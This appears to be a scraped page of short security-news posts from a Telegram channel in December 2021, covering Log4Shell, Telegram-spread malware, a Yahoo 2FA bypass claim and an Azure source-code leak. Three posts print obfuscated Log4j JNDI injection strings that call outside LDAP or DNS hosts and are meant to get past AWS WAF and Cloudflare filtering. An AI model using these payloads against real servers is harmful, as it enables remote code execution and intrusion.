■■■■□ Cyber-Attack via Telegram as Exhelon malware is spread via group chats. Warning An attack on thematic @telegram crypto chats ongoing now. The attackers use an account named “Smokes Night” to spread Echelon malware by dropping a file into the chat room. TLDR: Disable auto-downloading in Telegram settings to prevent malware execution. Thread: https://twitter.com/officer_cia/status/1474724675930447875 https://t.me/cKure/10466
All posts tagged hack
December 23, 2021 at 08:32PM
■■■□□ Log4Shell: Log4j RCE Exploitation Detection. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b#log4j-rce-exploitation-detection https://t.me/cKure/10464
December 23, 2021 at 08:19PM
■■■□□ A threat actor shares video of an alleged exploit that can bypass Yahoo authentication mechanism including 2FA. The exploit is CSRF based and requires user interaction. https://t.me/cKure/10461
December 23, 2021 at 04:05PM
■■■□□ Log4j / Log4Shell AWS bypass. ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Source: https://twitter.com/11xuxx/status/1471236310299906050 https://t.me/cKure/10460
December 23, 2021 at 04:03PM
■■■□□ Log4J v2.15.0 Patch Bypass RCE Log4j-scan can now discover the new patch bypass on v2.15.0 (CVE-2021-45046). Just bypassed AWS WAF for log4j jndi injection: ${j $ {k 8s :k5:-ND }i${sd: k5:-:}ldap://mydogsbutt.c om: 13 89/o} https://t.me/cKure/10459
December 23, 2021 at 04:01PM
■■■□□ Log4j Cloudflare bypass. ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ https://t.me/cKure/10458
December 23, 2021 at 04:58AM
■■■□□ A three-year-long honeypot experiment featuring simulated low-interaction IoT devices of various types and locations gives a clear idea of why actors target specific devices. https://www.bleepingcomputer.com/news/security/honeypot-experiment-reveals-what-hackers-want-from-iot-devices/ https://t.me/cKure/10456
December 23, 2021 at 04:57AM
■■□□□ Data-Leak: Microsoft Customer Source Code Exposed via Azure App Service Bug. Researchers found an insecure default behavior in Azure App Service exposing source code of some customer applications deployed using “Local Git.” https://t.me/cKure/10455
December 23, 2021 at 03:48AM
■■■■□ Android Application Testing Using Windows 11 and Windows Subsystem for Android. https://sensepost.com/blog/2021/android-application-testing-using-windows-11-and-windows-subsystem-for-android/ https://t.me/cKure/10454
December 22, 2021 at 08:00PM
■■■■□ Zero-Day: China suspends deal with Alibaba for not sharing Log4j 0-day first with the government. https://thehackernews.com/2021/12/china-suspends-deal-with-alibaba-for.html https://t.me/cKure/10453
